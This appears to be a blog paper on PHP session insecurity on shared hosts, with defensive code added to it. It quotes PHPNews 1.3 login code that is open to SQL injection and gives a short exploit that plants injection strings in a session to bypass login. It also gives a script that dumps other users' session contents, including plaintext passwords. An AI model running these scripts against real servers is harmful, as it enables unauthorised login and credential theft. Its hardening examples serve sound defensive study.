[Paper] Insecurity in PHP sessions By Xianur0
Posted on 17:22 by Xianur0
Sessions, as the name says, are user sessions: they hold arbitrary information about the user, or the user's ID. Sessions used on a shared server can be a serious security flaw, because they can be used for certain kinds of attacks, including data mining (searching for useful information). For example, if we go to the temporary directory PHP uses to store sessions (almost always /tmp/), we can find sessions like this:
user|s:5:"admin";password|s:11:"mipassword";
where user is the name of the first session variable, 5 is the id and admin is its content; the second variable holds the password in the same way.
Now we have a username and a password.
Also, many developers overlook the possibility of injecting data through sessions, as in the example below:
Vulnerable code (PHPNews 1.3):
    // Session values are trusted: they are copied into the query without escaping
    if((isset($_POST['user']) && isset($_POST['password'])) || (isset($_SESSION['user']) && isset($_SESSION['password'])))
    {
        if(isset($_SESSION['user']) && isset($_SESSION['password']))
        {
            // No addslashes() on this branch: the session is assumed to be safe
            $in_user = $_SESSION['user'];
            $in_password = $_SESSION['password'];
        }
        else if(isset($_POST['user']) && isset($_POST['password']))
        {
            if (!get_magic_quotes_gpc())
            {
                $in_user = addslashes($_POST['user']);
                $in_password = addslashes($_POST['password']);
            }
            else
            {
                $in_user = $_POST['user'];
                $in_password = $_POST['password'];
            }
        }
        // The query is built by string concatenation, so an injected $in_user
        // or $in_password changes its meaning
        $result = mysql_query('SELECT * FROM ' . $db_prefix . 'posters WHERE username = \'' . $in_user . '\' AND password = password(\'' . $in_password . '\')');
        $dbQueries++;
        if(mysql_numrows($result) != 0)
        {
            $auth = true;
            // The plaintext credentials are written back into the session file
            $_SESSION['user'] = $in_user;
            $_SESSION['password'] = $in_password;
        }
        else
        {
            $bad_details = true;
        }
    }
Exploit: bypass through sessions:
    <?php
    session_start();
    // Writes the injection strings into this script's own session file
    $_SESSION["user"] = "' OR '1'='1";
    $_SESSION["password"] = "') OR ('1'='1";
    print "Cookie Master: <br>\nPHPSESSID=".$_COOKIE['PHPSESSID']."<br>\n";
    ?>
The session values are not filtered, so you can set these session variables and inject data through them; the exploit above only works if PHP is using the same session save path as PHPNews.
Although safe_mode cannot be bypassed for directories, almost always the same temporary directory is used on a server for everything, so sessions can be generated regardless of the security mechanisms in use (the obvious fix is to change the temporary directory to one that cannot be read by other users on the same server, and to filter session values completely).
The sessions can also simply be read, since they are stored as temporary files in directories that are almost always readable by every user of that server.
You can also obtain the content of the sessions when you cannot read the files directly:
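As an added example (not PHPNews code, and not part of the original post), here is a hardened form of the login above. It assumes a PDO connection in $pdo and a hypothetical posters table with columns id, username and password_hash (the output of password_hash()); those names are assumptions. The two changes that matter are that user input, whether from $_POST or from $_SESSION, never becomes part of the SQL text, and that the session stores only an integer user id rather than the credentials themselves.

```php
<?php
// Added example, not PHPNews code. Assumes a PDO connection $pdo and a
// hypothetical table `posters` (id, username, password_hash).

session_start();

function authenticate(PDO $pdo, string $user, string $password): ?int
{
    // Placeholders keep the input out of the SQL text, so quotes in
    // $user or $password cannot change the query.
    $stmt = $pdo->prepare('SELECT id, password_hash FROM posters WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return null;
    }
    return (int) $row['id'];
}

function currentUserId(): ?int
{
    // Treat the session as untrusted storage: on a shared host another
    // account may have written this file. Accept only an integer id and
    // never keep credentials or anything query-like in the session.
    if (!isset($_SESSION['user_id']) || !is_int($_SESSION['user_id'])) {
        return null;
    }
    return $_SESSION['user_id'];
}

$auth = false;
$bad_details = false;

if (currentUserId() !== null) {
    $auth = true;
} elseif (isset($_POST['user'], $_POST['password'])) {
    $id = authenticate($pdo, (string) $_POST['user'], (string) $_POST['password']);
    if ($id === null) {
        $bad_details = true;
    } else {
        // Issue a fresh session id on login so an id planted beforehand is discarded
        session_regenerate_id(true);
        $_SESSION = ['user_id' => $id];
        $auth = true;
    }
}
```

Prepared statements close the injection, and dropping the password from the session means a readable session file no longer leaks a credential. They do not on their own stop someone who can write into a shared session directory from planting a user_id, so the private session directory the post recommends is still required.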
    <?php
    @session_start();
    // Dumps every variable PHP loaded from the session file
    foreach ($_SESSION as $name => $valor)
    {
        print "<b>Name:</b> $name\n<br><b>Value:</b> $valor\n<br><br>";
    }
    ?>
PHP opens the session temporary directory as soon as the global $_SESSION is used (and this is not filtered by safe_mode), so we obtain the values of the sessions regardless of the domain (what travels over HTTP is only a reference to the session file on the server); the session directory can be chosen with the function session_save_path().
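The defensive counterpart, as an added example that is not from the post or from PHPNews: give the application its own session directory outside the web root and refuse to start if that directory is shared or readable by other accounts. The path in APP_SESSION_DIR is a placeholder; everything else uses standard PHP functions.

```php
<?php
// Added example (not from the post). APP_SESSION_DIR is a placeholder path;
// it must be outside the web root and owned by the account running PHP.

const APP_SESSION_DIR = '/home/myapp/private/sessions';

function sessionDirProblems(string $dir): array
{
    $problems = [];
    if (!is_dir($dir)) {
        $problems[] = "$dir does not exist";
        return $problems;
    }
    $mode = fileperms($dir) & 0777;
    // Any group/other bit means another account on the host can list,
    // read or plant session files here.
    if ($mode & 0077) {
        $problems[] = sprintf('%s is mode %04o; expected 0700', $dir, $mode);
    }
    if (function_exists('posix_geteuid') && fileowner($dir) !== posix_geteuid()) {
        $problems[] = "$dir is not owned by the account running PHP";
    }
    // The system temp directory is exactly the shared location the post describes
    if (realpath($dir) === realpath(sys_get_temp_dir())) {
        $problems[] = "$dir is the system temp directory shared with every user";
    }
    return $problems;
}

function usePrivateSessionDir(string $dir): void
{
    if (!is_dir($dir) && !mkdir($dir, 0700, true)) {
        throw new RuntimeException("cannot create $dir");
    }
    $problems = sessionDirProblems($dir);
    if ($problems !== []) {
        throw new RuntimeException(implode('; ', $problems));
    }
    // Must run before session_start(): session files now go here, not /tmp
    session_save_path($dir);
    ini_set('session.use_strict_mode', '1');   // reject ids the server never issued
    ini_set('session.use_only_cookies', '1');  // no session id in the URL
    ini_set('session.cookie_httponly', '1');
    session_start();
}

usePrivateSessionDir(APP_SESSION_DIR);
```

This only isolates sessions where each account's PHP runs under its own Unix user (suPHP, FastCGI or PHP-FPM pools). Under a single shared mod_php user, every directory that user can read is still reachable from every site on the host, and the remedy is the hosting model, not the directory.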
I wrote a tool to automate this process:
http://xianur0.blogspot.com/2008/10/session-master-by-xianur0.html